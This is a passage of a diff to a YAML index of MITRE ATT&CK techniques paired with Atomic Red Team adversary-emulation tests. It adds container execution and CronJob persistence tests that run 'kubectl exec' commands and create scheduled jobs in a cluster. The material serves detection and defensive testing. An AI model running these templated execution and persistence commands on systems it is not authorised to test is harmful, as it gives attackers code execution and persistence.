establishing operational resources (ex: [Develop Capabilities](https://attack.mitre.org/techniques/T1587) or [Obtain Capabilities](https://attack.mitre.org/techniques/T1588)), and/or initial access (ex: [Exploit Public-Facing Application](https://attack.mitre.org/techniques/T1190)). + name: Vulnerability Scanning + created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 + object_marking_refs: + - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168 external_references: - source_name: mitre-attack external_id: T1595.002 @@ -52999,34 +56116,25 @@ reconnaissance: url: https://wiki.owasp.org/index.php/OAT-014_Vulnerability_Scanning description: OWASP Wiki. (2018, February 16). OAT-014 Vulnerability Scanning. Retrieved October 20, 2020. - object_marking_refs: - - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168 - created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 - name: Vulnerability Scanning - description: |- - Before compromising a victim, adversaries may scan victims for vulnerabilities that can be used during targeting. Vulnerability scans typically check if the configuration of a target host/application (ex: software and version) potentially aligns with the target of a specific exploit the adversary may seek to use. - - These scans may also include more broad attempts to [Gather Victim Host Information](https://attack.mitre.org/techniques/T1592) that can be used to identify more commonly known, exploitable vulnerabilities. Vulnerability scans typically harvest running software and version numbers via server banners, listening ports, or other network artifacts.(Citation: OWASP Vuln Scanning) Information from these scans may reveal opportunities for other forms of reconnaissance (ex: [Search Open Websites/Domains](https://attack.mitre.org/techniques/T1593) or [Search Open Technical Databases](https://attack.mitre.org/techniques/T1596)), establishing operational resources (ex: [Develop Capabilities](https://attack.mitre.org/techniques/T1587) or [Obtain Capabilities](https://attack.mitre.org/techniques/T1588)), and/or initial access (ex: [Exploit Public-Facing Application](https://attack.mitre.org/techniques/T1190)). - id: attack-pattern--5502c4e9-24ef-4d5f-8ee9-9e906c2f82c4 type: attack-pattern kill_chain_phases: - kill_chain_name: mitre-attack phase_name: reconnaissance - modified: '2020-10-24T03:58:06.761Z' + modified: '2021-04-15T03:20:09.446Z' created: '2020-10-02T16:55:16.047Z' - x_mitre_data_sources: - - Packet capture - - Network device logs + x_mitre_platforms: + - PRE + x_mitre_is_subtechnique: true + x_mitre_version: '1.0' x_mitre_detection: |- Monitor for suspicious network traffic that could be indicative of scanning, such as large quantities originating from a single source (especially if the source is known to be associated with an adversary/botnet). Analyzing web metadata may also reveal artifacts that can be attributed to potentially malicious activity, such as referer or user-agent string HTTP/S fields. Much of this activity may have a very high occurrence and associated false positive rate, as well as potentially taking place outside the visibility of the target organization, making detection difficult for defenders. Detection efforts may be focused on related stages of the adversary lifecycle, such as during Initial Access. - x_mitre_version: '1.0' - x_mitre_is_subtechnique: true - x_mitre_platforms: - - PRE + x_mitre_data_sources: + - 'Network Traffic: Network Traffic Flow' + - 'Network Traffic: Network Traffic Content' atomic_tests: [] T1596.002: technique: @@ -53042,7 +56150,7 @@ reconnaissance: created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 name: WHOIS description: |- - Before compromising a victim, adversaries may search public WHOIS data for information about victims that can be used during targeting. WHOIS data is stored by regional Internet registries (RIR) responsible for allocating and assigning Internet resources such as domain names. Anyone can query WHOIS servers for information about a registered domain, such as assigned IP blocks, contact information, and DNS nameservers.(Citation: WHOIS) + Adversaries may search public WHOIS data for information about victims that can be used during targeting. WHOIS data is stored by regional Internet registries (RIR) responsible for allocating and assigning Internet resources such as domain names. Anyone can query WHOIS servers for information about a registered domain, such as assigned IP blocks, contact information, and DNS nameservers.(Citation: WHOIS) Adversaries may search WHOIS data to gather actionable information. Threat actors can use online resources or command-line utilities to pillage through WHOIS data for information about potential victims. Information from these sources may reveal opportunities for other forms of reconnaissance (ex: [Active Scanning](https://attack.mitre.org/techniques/T1595) or [Phishing for Information](https://attack.mitre.org/techniques/T1598)), establishing operational resources (ex: [Acquire Infrastructure](https://attack.mitre.org/techniques/T1583) or [Compromise Infrastructure](https://attack.mitre.org/techniques/T1584)), and/or initial access (ex: [External Remote Services](https://attack.mitre.org/techniques/T1133) or [Trusted Relationship](https://attack.mitre.org/techniques/T1199)). id: attack-pattern--166de1c6-2814-4fe5-8438-4e80f76b169f @@ -53050,7 +56158,7 @@ reconnaissance: kill_chain_phases: - kill_chain_name: mitre-attack phase_name: reconnaissance - modified: '2020-10-24T04:20:43.941Z' + modified: '2021-04-15T03:50:44.113Z' created: '2020-10-02T16:56:49.744Z' x_mitre_detection: |- Much of this activity may have a very high occurrence and associated false positive rate, as well as potentially taking place outside the visibility of the target organization, making detection difficult for defenders. @@ -53114,9 +56222,9 @@ execution: Understanding standard usage patterns is important to avoid a high number of false positives. If scripting is restricted for normal users, then any attempts to enable scripts running on a system would be considered suspicious. If scripts are not commonly used on a system, but enabled, scripts running out of cycle from patching or other administrator functions are suspicious. Scripts should be captured from the file system when possible to determine their actions and intent. x_mitre_data_sources: - - API monitoring - - Process monitoring - - Process command-line parameters + - 'Command: Command Execution' + - 'Process: Process Creation' + - 'Process: OS API Execution' x_mitre_platforms: - macOS identifier: T1059.002 @@ -53180,8 +56288,9 @@ execution: and Control, learning details about the environment through Discovery, and Lateral Movement." x_mitre_data_sources: - - Process command-line parameters - - Process monitoring + - 'Scheduled Job: Scheduled Job Creation' + - 'Command: Command Execution' + - 'Process: Process Creation' x_mitre_platforms: - Linux identifier: T1053.001 @@ -53285,10 +56394,10 @@ execution: modified: '2020-03-24T13:43:40.776Z' created: '2019-11-27T13:52:45.853Z' x_mitre_data_sources: - - File monitoring - - Process command-line parameters - - Process monitoring - - Windows event logs + - 'Scheduled Job: Scheduled Job Creation' + - 'Command: Command Execution' + - 'File: File Modification' + - 'Process: Process Creation' x_mitre_version: '1.0' x_mitre_is_subtechnique: true x_mitre_remote_support: true @@ -53330,49 +56439,49 @@ execution: ' T1059: technique: - id: attack-pattern--7385dfaf-6886-4229-9ecd-6fd678040830 - created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 - name: Command and Scripting Interpreter - description: |- - Adversaries may abuse command and script interpreters to execute commands, scripts, or binaries. These interfaces and languages provide ways of interacting with computer systems and are a common feature across many different platforms. Most systems come with some built-in command-line interface and scripting capabilities, for example, macOS and Linux distributions include some flavor of [Unix Shell](https://attack.mitre.org/techniques/T1059/004) while Windows installations include the [Windows Command Shell](https://attack.mitre.org/techniques/T1059/003) and [PowerShell](https://attack.mitre.org/techniques/T1059/001). - - There are also cross-platform interpreters such as [Python](https://attack.mitre.org/techniques/T1059/006), as well as those commonly associated with client applications such as [JavaScript/JScript](https://attack.mitre.org/techniques/T1059/007) and [Visual Basic](https://attack.mitre.org/techniques/T1059/005). - - Adversaries may abuse these technologies in various ways as a means of executing arbitrary commands. Commands and scripts can be embedded in [Initial Access](https://attack.mitre.org/tactics/TA0001) payloads delivered to victims as lure documents or as secondary payloads downloaded from an existing C2. Adversaries may also execute commands through interactive terminals/shells. + created: '2017-05-31T21:30:49.546Z' + modified: '2021-04-27T19:21:06.164Z' + kill_chain_phases: + - kill_chain_name: mitre-attack + phase_name: execution + type: attack-pattern + revoked: false + object_marking_refs: + - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168 external_references: - source_name: mitre-attack external_id: T1059 url: https://attack.mitre.org/techniques/T1059 - object_marking_refs: - - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168 - revoked: false - type: attack-pattern - kill_chain_phases: - - kill_chain_name: mitre-attack - phase_name: execution - modified: '2020-10-22T16:43:39.362Z' - created: '2017-05-31T21:30:49.546Z' - x_mitre_is_subtechnique: false - x_mitre_remote_support: false - x_mitre_permissions_required: - - User - x_mitre_platforms: - - Linux - - macOS - - Windows - - Network + description: |- + Adversaries may abuse command and script interpreters to execute commands, scripts, or binaries. These interfaces and languages provide ways of interacting with computer systems and are a common feature across many different platforms. Most systems come with some built-in command-line interface and scripting capabilities, for example, macOS and Linux distributions include some flavor of [Unix Shell](https://attack.mitre.org/techniques/T1059/004) while Windows installations include the [Windows Command Shell](https://attack.mitre.org/techniques/T1059/003) and [PowerShell](https://attack.mitre.org/techniques/T1059/001). + + There are also cross-platform interpreters such as [Python](https://attack.mitre.org/techniques/T1059/006), as well as those commonly associated with client applications such as [JavaScript](https://attack.mitre.org/techniques/T1059/007) and [Visual Basic](https://attack.mitre.org/techniques/T1059/005). + + Adversaries may abuse these technologies in various ways as a means of executing arbitrary commands. Commands and scripts can be embedded in [Initial Access](https://attack.mitre.org/tactics/TA0001) payloads delivered to victims as lure documents or as secondary payloads downloaded from an existing C2. Adversaries may also execute commands through interactive terminals/shells. + name: Command and Scripting Interpreter + created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 + id: attack-pattern--7385dfaf-6886-4229-9ecd-6fd678040830 + x_mitre_version: '2.1' + x_mitre_data_sources: + - 'Command: Command Execution' + - 'Process: Process Creation' + - 'Module: Module Load' + - 'Script: Script Execution' x_mitre_detection: |- Command-line and scripting activities can be captured through proper logging of process execution with command-line arguments. This information can be useful in gaining additional insight to adversaries' actions through how they use native processes or custom tools. Also monitor for loading of modules associated with specific languages. If scripting is restricted for normal users, then any attempt to enable scripts running on a system would be considered suspicious. If scripts are not commonly used on a system, but enabled, scripts running out of cycle from patching or other administrator functions are suspicious. Scripts should be captured from the file system when possible to determine their actions and intent. Scripts are likely to perform actions with various effects on a system that may generate events, depending on the types of monitoring used. Monitor processes and command-line arguments for script execution and subsequent behavior. Actions may be related to network and system information discovery, collection, or other scriptable post-compromise behaviors and could be used as indicators of detection leading back to the source script. - x_mitre_data_sources: - - Windows event logs - - PowerShell logs - - Process monitoring - - Process command-line parameters - x_mitre_version: '2.1' + x_mitre_platforms: + - Linux + - macOS + - Windows + - Network + x_mitre_permissions_required: + - User + x_mitre_remote_support: false + x_mitre_is_subtechnique: false atomic_tests: [] T1559.001: technique: @@ -53429,8 +56538,9 @@ execution: especially those invoked by a user different than the one currently logged on. " x_mitre_data_sources: - - Process monitoring - - DLL monitoring + - 'Module: Module Load' + - 'Process: Process Creation' + - 'Script: Script Execution' atomic_tests: [] T1175: technique: @@ -53535,15 +56645,6 @@ execution: created: '2018-01-16T16:13:52.465Z' x_mitre_deprecated: true x_mitre_version: '2.0' - x_mitre_data_sources: - - PowerShell logs - - API monitoring - - Authentication logs - - DLL monitoring - - Packet capture - - Process monitoring - - Windows Registry - - Windows event logs x_mitre_detection: |- Monitor for COM objects loading DLLs and other modules not typically associated with the application.(Citation: Enigma Outlook DCOM Lateral Movement Nov 2017) Enumeration of COM objects, via [Query Registry](https://attack.mitre.org/techniques/T1012) or [PowerShell](https://attack.mitre.org/techniques/T1086), may also proceed malicious use.(Citation: Fireeye Hunting COM June 2019)(Citation: Enigma MMC20 COM Jan 2017) @@ -53559,6 +56660,218 @@ execution: x_mitre_remote_support: true x_mitre_is_subtechnique: false atomic_tests: [] + T1609: + technique: + id: attack-pattern--7b50a1d3-4ca7-45d1-989d-a6503f04bfe1 + description: |- + Adversaries may abuse a container administration service to execute commands within a container. A container administration service such as the Docker daemon, the Kubernetes API server, or the kubelet may allow remote management of containers within an environment.(Citation: Docker Daemon CLI)(Citation: Kubernetes API)(Citation: Kubernetes Kubelet) + + In Docker, adversaries may specify an entrypoint during container deployment that executes a script or command, or they may use a command such as docker exec to execute a command within a running container.(Citation: Docker Entrypoint)(Citation: Docker Exec) In Kubernetes, if an adversary has sufficient permissions, they may gain remote execution in a container in the cluster via interaction with the Kubernetes API server, the kubelet, or by running a command such as kubectl exec.(Citation: Kubectl Exec Get Shell) + name: Container Administration Command + created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 + object_marking_refs: + - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168 + external_references: + - source_name: mitre-attack + external_id: T1609 + url: https://attack.mitre.org/techniques/T1609 + - source_name: Docker Daemon CLI + url: https://docs.docker.com/engine/reference/commandline/dockerd/ + description: Docker. (n.d.). DockerD CLI. Retrieved March 29, 2021. + - source_name: Kubernetes API + url: https://kubernetes.io/docs/concepts/overview/kubernetes-api/ + description: The Kubernetes Authors. (n.d.). The Kubernetes API. Retrieved + March 29, 2021. + - source_name: Kubernetes Kubelet + url: https://kubernetes.io/docs/reference/command-line-tools-reference/kubelet/ + description: The Kubernetes Authors. (n.d.). Kubelet. Retrieved March 29, + 2021. + - source_name: Docker Entrypoint + url: https://docs.docker.com/engine/reference/run/#entrypoint-default-command-to-execute-at-runtime + description: Docker. (n.d.). Docker run reference. Retrieved March 29, 2021. + - source_name: Docker Exec + url: https://docs.docker.com/engine/reference/commandline/exec/ + description: Docker. (n.d.). Docker Exec. Retrieved March 29, 2021. + - source_name: Kubectl Exec Get Shell + url: https://kubernetes.io/docs/tasks/debug-application-cluster/get-shell-running-container/ + description: The Kubernetes Authors. (n.d.). Get a Shell to a Running Container. + Retrieved March 29, 2021. + type: attack-pattern + kill_chain_phases: + - kill_chain_name: mitre-attack + phase_name: execution + modified: '2021-04-14T12:01:10.545Z' + created: '2021-03-29T16:39:26.183Z' + x_mitre_platforms: + - Containers + x_mitre_contributors: + - Alfredo Oliveira, Trend Micro + - David Fiser, @anu4is, Trend Micro + - Brad Geesaman, @bradgeesaman + - Center for Threat-Informed Defense (CTID) + - Magno Logan, @magnologan, Trend Micro + - Vishwas Manral, McAfee + - Yossi Weizman, Azure Defender Research Team + x_mitre_detection: 'Container administration service activities and executed + commands can be captured through logging of process execution with command-line + arguments on the container and the underlying host. In Docker, the daemon + log provides insight into events at the daemon and container service level. + Kubernetes system component logs may also detect activities running in and + out of containers in the cluster. ' + x_mitre_remote_support: true + x_mitre_is_subtechnique: false + x_mitre_version: '1.0' + x_mitre_data_sources: + - 'Command: Command Execution' + identifier: T1609 + atomic_tests: + - name: ExecIntoContainer + auto_generated_guid: d03bfcd3-ed87-49c8-8880-44bb772dea4b + description: 'Attackers who have permissions, can run malicious commands in + containers in the cluster using exec command (“kubectl exec”). In this method, + attackers can use legitimate images, such as an OS image (e.g., Ubuntu) as + a backdoor container, and run their malicious code remotely by using “kubectl + exec”. + +' + supported_platforms: + - linux + - macos + input_arguments: + namespace: + description: K8s namespace to use + type: String + default: default + command: + description: Command to run + type: String + default: uname + executor: + prereq_command: 'which kubectl + +' + command: | + kubectl create -f src/busybox.yaml -n #{namespace} + kubectl exec -n #{namespace} busybox -- #{command} + cleanup_command: 'kubectl delete pod busybox -n #{namespace} + +' + name: bash + elevation_required: false + T1053.007: + technique: + external_references: + - source_name: mitre-attack + external_id: T1053.007 + url: https://attack.mitre.org/techniques/T1053/007 + - source_name: Kubernetes Jobs + url: https://kubernetes.io/docs/concepts/workloads/controllers/job/ + description: The Kubernetes Authors. (n.d.). Kubernetes Jobs. Retrieved March + 30, 2021. + - source_name: Kubernetes CronJob + url: https://kubernetes.io/docs/concepts/workloads/controllers/cron-jobs/ + description: The Kubernetes Authors. (n.d.). Kubernetes CronJob. Retrieved + March 29, 2021. + - source_name: Threat Matrix for Kubernetes + url: https://www.microsoft.com/security/blog/2020/04/02/attack-matrix-kubernetes/ + description: Weizman, Y. (2020, April 2). Threat Matrix for Kubernetes. Retrieved + March 30, 2021. + object_marking_refs: + - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168 + created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 + name: Container Orchestration Job + description: |- + Adversaries may abuse task scheduling functionality provided by container orchestration tools such as Kubernetes to schedule deployment of containers configured to execute malicious code. Container orchestration jobs run these automated tasks at a specific date and time, similar to cron jobs on a Linux system. Deployments of this type can also be configured to maintain a quantity of containers over time, automating the process of maintaining persistence within a cluster. + + In Kubernetes, a CronJob may be used to schedule a Job that runs one or more containers to perform specific tasks.(Citation: Kubernetes Jobs)(Citation: Kubernetes CronJob) An adversary therefore may utilize a CronJob to schedule deployment of a Job that executes malicious code in the cluster.(Citation: Threat Matrix for Kubernetes) + id: attack-pattern--1126cab1-c700-412f-a510-61f4937bb096 + type: attack-pattern + kill_chain_phases: + - kill_chain_name: mitre-attack + phase_name: execution + - kill_chain_name: mitre-attack + phase_name: persistence + - kill_chain_name: mitre-attack + phase_name: privilege-escalation + modified: '2021-04-12T18:09:46.821Z' + created: '2021-03-29T17:06:22.247Z' + x_mitre_version: '1.0' + x_mitre_is_subtechnique: true + x_mitre_permissions_required: + - User + x_mitre_detection: 'Monitor for the anomalous creation of scheduled jobs in + container orchestration environments. Use logging agents on Kubernetes nodes + and retrieve logs from sidecar proxies for application and resource pods to + monitor malicious container orchestration job deployments. ' + x_mitre_contributors: + - Center for Threat-Informed Defense (CTID) + - Vishwas Manral, McAfee + - Yossi Weizman, Azure Defender Research Team + x_mitre_platforms: + - Containers + x_mitre_data_sources: + - 'Scheduled Job: Scheduled Job Creation' + - 'Container: Container Creation' + - 'File: File Creation' + identifier: T1053.007 + atomic_tests: + - name: ListCronjobs + auto_generated_guid: ddfb0bc1-3c3f-47e9-a298-550ecfefacbd + description: 'Kubernetes Job is a controller that creates one or more pods and + ensures that a specified number of them successfully terminate. Kubernetes + Job can be used to run containers that perform finite tasks for batch jobs. + Kubernetes CronJob is used to schedule Jobs. Attackers may use Kubernetes + CronJob for scheduling execution of malicious code that would run as a container + in the cluster. + +' + supported_platforms: + - linux + - macos + input_arguments: + namespace: + description: K8s namespace to list + type: String + default: default + executor: + prereq_command: 'which kubectl + +' + command: 'kubectl get cronjobs -n #{namespace} + +' + name: bash + elevation_required: false + - name: CreateCronjob + auto_generated_guid: f2fa019e-fb2a-4d28-9dc6-fd1a9b7f68c3 + description: 'Kubernetes Job is a controller that creates one or more pods and + ensures that a specified number of them successfully terminate. Kubernetes + Job can be used to run containers that perform finite tasks for batch jobs. + Kubernetes CronJob is used to schedule Jobs. Attackers may use Kubernetes + CronJob for scheduling execution of malicious code that would run as a container + in the cluster. + +' + supported_platforms: + - linux + - macos + input_arguments: + namespace: + description: K8s namespace to list + type: String + default: default + executor: + prereq_command: 'which kubectl + +' + command: 'kubectl create -f src/cronjob.yaml -n #{namespace} + +' + cleanup_command: 'kubectl delete cronjob art -n #{namespace} + +' + name: bash + elevation_required: false T1053.003: technique: external_references: @@ -53600,8 +56913,10 @@ execution: connections made for Command and Control, learning details about the environment through Discovery, and Lateral Movement. " x_mitre_data_sources: - - Process command-line parameters - - Process monitoring + - 'Scheduled Job: Scheduled Job Creation' + - 'Command: Command Execution' + - 'File: File Modification' + - 'Process: Process Creation' x_mitre_platforms: - Linux - macOS @@ -53694,6 +57009,76 @@ execution: cleanup_command: 'rm /var/spool/cron/crontabs/#{cron_script_name} ' + T1610: + technique: + external_references: + - source_name: mitre-attack + external_id: T1610 + url: https://attack.mitre.org/techniques/T1610 + - source_name: Docker Containers API + url: https://docs.docker.com/engine/api/v1.41/#tag/Container + description: Docker. (n.d.). Docker Engine API v1.41 Reference - Container. + Retrieved March 29, 2021. + - source_name: Kubernetes Dashboard + url: https://kubernetes.io/docs/tasks/access-application-cluster/web-ui-dashboard/ + description: The Kubernetes Authors. (n.d.). Kubernetes Web UI (Dashboard). + Retrieved March 29, 2021. + - source_name: Kubeflow Pipelines + url: https://www.kubeflow.org/docs/components/pipelines/overview/pipelines-overview/ + description: The Kubeflow Authors. (n.d.). Overview of Kubeflow Pipelines. + Retrieved March 29, 2021. + - source_name: Aqua Build Images on Hosts + url: https://blog.aquasec.com/malicious-container-image-docker-container-host + description: 'Assaf Morag. (2020, July 15). Threat Alert: Attackers Building + Malicious Images on Your Hosts. Retrieved March 29, 2021.' + object_marking_refs: + - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168 + created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 + name: Deploy Container + description: |- + Adversaries may deploy a container into an environment to facilitate execution or evade defenses. In some cases, adversaries may deploy a new container to execute processes associated with a particular image or deployment, such as processes that execute or download malware. In others, an adversary may deploy a new container configured without network rules, user limitations, etc. to bypass existing defenses within the environment. + + Containers can be deployed by various means, such as via Docker's create and start APIs or via a web application such as the Kubernetes dashboard or Kubeflow.(Citation: Docker Containers API)(Citation: Kubernetes Dashboard)(Citation: Kubeflow Pipelines) Adversaries may deploy containers based on retrieved or built malicious images or from benign images that download and execute malicious payloads at runtime.(Citation: Aqua Build Images on Hosts) + id: attack-pattern--56e0d8b8-3e25-49dd-9050-3aa252f5aa92 + type: attack-pattern + kill_chain_phases: + - kill_chain_name: mitre-attack + phase_name: defense-evasion + - kill_chain_name: mitre-attack + phase_name: execution + modified: '2021-04-14T12:02:20.641Z' + created: '2021-03-29T16:51:26.020Z' + x_mitre_version: '1.0' + x_mitre_is_subtechnique: false + x_mitre_permissions_required: + - User + - root + x_mitre_remote_support: true + x_mitre_detection: Monitor for suspicious or unknown container images and pods + in your environment. Deploy logging agents on Kubernetes nodes and retrieve + logs from sidecar proxies for application pods to detect malicious activity + at the cluster level. In Docker, the daemon log provides insight into remote + API calls, including those that deploy containers. Logs for management services + or applications used to deploy containers other than the native technologies + themselves should also be monitored. + x_mitre_contributors: + - Pawan Kinger, @kingerpawan, Trend Micro + - Alfredo Oliveira, Trend Micro + - Idan Frimark, Cisco + - Center for Threat-Informed Defense (CTID) + - Magno Logan, @magnologan, Trend Micro + - Ariel Shuper, Cisco + - Vishwas Manral, McAfee + - Yossi Weizman, Azure Defender Research Team + x_mitre_platforms: + - Containers + x_mitre_data_sources: + - 'Container: Container Creation' + - 'Container: Container Start' + - 'Pod: Pod Creation' + - 'Pod: Pod Modification' + - 'Application Log: Application Log Content' + atomic_tests: [] T1559.002: technique: created: '2020-02-12T14:10:50.699Z' @@ -53761,9 +57146,9 @@ execution: x_mitre_permissions_required: - User x_mitre_data_sources: - - Process monitoring - - DLL monitoring - - File monitoring + - 'Module: Module Load' + - 'Process: Process Creation' + - 'Script: Script Execution' identifier: T1559.002 atomic_tests: - name: Execute Commands @@ -53868,10 +57253,6 @@ execution: modified: '2020-03-28T19:06:02.690Z' created: '2018-04-18T17:59:24.739Z' x_mitre_version: '1.1' - x_mitre_data_sources: - - Anti-virus - - System calls - - Process monitoring x_mitre_detection: Detecting software exploitation may be difficult depending on the tools available. Also look for behavior on the endpoint system that might indicate successful compromise, such as abnormal behavior of the browser @@ -53918,11 +57299,6 @@ execution: x_mitre_deprecated: true x_mitre_is_subtechnique: false x_mitre_version: '2.0' - x_mitre_data_sources: - - File monitoring - - Process monitoring - - Process command-line parameters - - Binary file metadata x_mitre_detection: "Detection of execution through the GUI will likely lead to significant false positives. Other factors should be considered to detect misuse of services that can lead to adversaries gaining access to systems @@ -53943,14 +57319,13 @@ execution: atomic_tests: [] T1559: technique: - external_references: - - source_name: mitre-attack - external_id: T1559 - url: https://attack.mitre.org/techniques/T1559 - object_marking_refs: - - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168 - created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 - name: Inter-Process Communication + created: '2020-02-12T14:08:48.689Z' + modified: '2020-03-28T19:34:47.546Z' + kill_chain_phases: + - kill_chain_name: mitre-attack + phase_name: execution + type: attack-pattern + id: attack-pattern--acd0ba37-7ba9-4cc5-ac61-796586cd856d description: "Adversaries may abuse inter-process communication (IPC) mechanisms for local code or command execution. IPC is typically used by processes to share data, communicate with each other, or synchronize execution. IPC is @@ -53962,30 +57337,37 @@ execution: or [Component Object Model](https://attack.mitre.org/techniques/T1559/001). Higher level execution mediums, such as those of [Command and Scripting Interpreter](https://attack.mitre.org/techniques/T1059)s, may also leverage underlying IPC mechanisms." - id: attack-pattern--acd0ba37-7ba9-4cc5-ac61-796586cd856d - type: attack-pattern - kill_chain_phases: - - kill_chain_name: mitre-attack - phase_name: execution - modified: '2020-03-28T19:34:47.546Z' - created: '2020-02-12T14:08:48.689Z' - x_mitre_data_sources: - - Process monitoring - - DLL monitoring - - File monitoring + name: Inter-Process Communication + created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 + object_marking_refs: + - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168 + external_references: + - source_name: mitre-attack + external_id: T1559 + url: https://attack.mitre.org/techniques/T1559 + x_mitre_platforms: + - Windows + x_mitre_is_subtechnique: false + x_mitre_version: '1.0' + x_mitre_detection: Monitor for strings in files/commands, loaded DLLs/libraries, + or spawned processes that are associated with abuse of IPC mechanisms. x_mitre_permissions_required: - Administrator - User - SYSTEM - x_mitre_detection: Monitor for strings in files/commands, loaded DLLs/libraries, - or spawned processes that are associated with abuse of IPC mechanisms. - x_mitre_version: '1.0' - x_mitre_is_subtechnique: false - x_mitre_platforms: - - Windows + x_mitre_data_sources: + - 'Module: Module Load' + - 'Process: Process Creation' + - 'Script: Script Execution' atomic_tests: [] T1059.007: technique: + created: '2020-06-23T19:12:24.924Z' + modified: '2021-04-27T19:21:05.521Z' + kill_chain_phases: + - kill_chain_name: mitre-attack + phase_name: execution + type: attack-pattern external_references: - source_name: mitre-attack external_id: T1059.007 @@ -54005,24 +57387,41 @@ execution: url: https://docs.microsoft.com/scripting/winscript/windows-script-interfaces description: Microsoft. (2017, January 18). Windows Script Interfaces. Retrieved June 23, 2020. + - source_name: Apple About Mac Scripting 2016 + url: https://developer.apple.com/library/archive/documentation/LanguagesUtilities/Conceptual/MacAutomationScriptingGuide/index.html + description: Apple. (2016, June 13). About Mac Scripting. Retrieved April + 14, 2021. + - source_name: SpecterOps JXA 2020 + url: https://posts.specterops.io/persistent-jxa-66e1c3cd1cf5 + description: Pitt, L. (2020, August 6). Persistent JXA. Retrieved April 14, + 2021. + - source_name: SentinelOne macOS Red Team + url: https://www.sentinelone.com/blog/macos-red-team-calling-apple-apis-without-building-binaries/ + description: 'Phil Stokes. (2019, December 5). macOS Red Team: Calling Apple + APIs Without Building Binaries. Retrieved July 17, 2020.' + - source_name: Red Canary Silver Sparrow Feb2021 + url: https://redcanary.com/blog/clipping-silver-sparrows-wings/ + description: 'Tony Lambert. (2021, February 18). Clipping Silver Sparrow’s + wings: Outing macOS malware before it takes flight. Retrieved April 20, + 2021.' + - source_name: MDSec macOS JXA and VSCode + url: https://www.mdsec.co.uk/2021/01/macos-post-exploitation-shenanigans-with-vscode-extensions/ + description: Dominic Chell. (2021, January 1). macOS Post-Exploitation Shenanigans + with VSCode Extensions. Retrieved April 20, 2021. object_marking_refs: - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168 created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 - name: JavaScript/JScript + name: JavaScript description: |- - Adversaries may abuse JavaScript and/or JScript for execution. JavaScript (JS) is a platform-agnostic scripting language (compiled just-in-time at runtime) commonly associated with scripts in webpages, though JS can be executed in runtime environments outside the browser.(Citation: NodeJS) + Adversaries may abuse various implementations of JavaScript for execution. JavaScript (JS) is a platform-independent scripting language (compiled just-in-time at runtime) commonly associated with scripts in webpages, though JS can be executed in runtime environments outside the browser.(Citation: NodeJS) JScript is the Microsoft implementation of the same scripting standard. JScript is interpreted via the Windows Script engine and thus integrated with many components of Windows such as the [Component Object Model](https://attack.mitre.org/techniques/T1559/001) and Internet Explorer HTML Application (HTA) pages.(Citation: JScrip May 2018)(Citation: Microsoft JScript 2007)(Citation: Microsoft Windows Scripts) - Adversaries may abuse JavaScript / JScript to execute various behaviors. Common uses include hosting malicious scripts on websites as part of a [Drive-by Compromise](https://attack.mitre.org/techniques/T1189) or downloading and executing these script files as secondary payloads. Since these payloads are text-based, it is also very common for adversaries to obfuscate their content as part of [Obfuscated Files or Information](https://attack.mitre.org/techniques/T1027). + JavaScript for Automation (JXA) is a macOS scripting language based on JavaScript, included as part of Apple’s Open Scripting Architecture (OSA), that was introduced in OSX 10.10. Apple’s OSA provides scripting capabilities to control applications, interface with the operating system, and bridge access into the rest of Apple’s internal APIs. As of OSX 10.10, OSA only supports two languages, JXA and [AppleScript](https://attack.mitre.org/techniques/T1059/002). Scripts can be executed via the command line utility osascript, they can be compiled into applications or script files via osacompile, and they can be compiled and executed in memory of other programs by leveraging the OSAKit Framework.(Citation: Apple About Mac Scripting 2016)(Citation: SpecterOps JXA 2020)(Citation: SentinelOne macOS Red Team)(Citation: Red Canary Silver Sparrow Feb2021)(Citation: MDSec macOS JXA and VSCode) + + Adversaries may abuse various implementations of JavaScript to execute various behaviors. Common uses include hosting malicious scripts on websites as part of a [Drive-by Compromise](https://attack.mitre.org/techniques/T1189) or downloading and executing these script files as secondary payloads. Since these payloads are text-based, it is also very common for adversaries to obfuscate their content as part of [Obfuscated Files or Information](https://attack.mitre.org/techniques/T1027). id: attack-pattern--0f4a0c76-ab2d-4cb0-85d3-3f0efb8cba0d - type: attack-pattern - kill_chain_phases: - - kill_chain_name: mitre-attack - phase_name: execution - modified: '2020-06-25T03:23:13.804Z' - created: '2020-06-23T19:12:24.924Z' - x_mitre_version: '1.0' + x_mitre_version: '2.0' x_mitre_is_subtechnique: true x_mitre_permissions_required: - User @@ -54031,17 +57430,20 @@ execution: x_mitre_detection: |- Monitor for events associated with scripting execution, such as process activity, usage of the Windows Script Host (typically cscript.exe or wscript.exe), file activity involving scripts, or loading of modules associated with scripting languages (ex: JScript.dll). Scripting execution is likely to perform actions with various effects on a system that may generate events, depending on the types of monitoring used. Monitor processes and command-line arguments for execution and subsequent behavior. Actions may be related to network and system information [Discovery](https://attack.mitre.org/tactics/TA0007), [Collection](https://attack.mitre.org/tactics/TA0009), or other programmable post-compromise behaviors and could be used as indicators of detection leading back to the source. + Monitor for execution of JXA through osascript and usage of OSAScript API that may be related to other suspicious behavior occurring on the system. + Understanding standard usage patterns is important to avoid a high number of false positives. If scripting is restricted for normal users, then any attempts to enable related components running on a system would be considered suspicious. If scripting is not commonly used on a system, but enabled, execution running out of cycle from patching or other administrator functions is suspicious. Scripts should be captured from the file system when possible to determine their actions 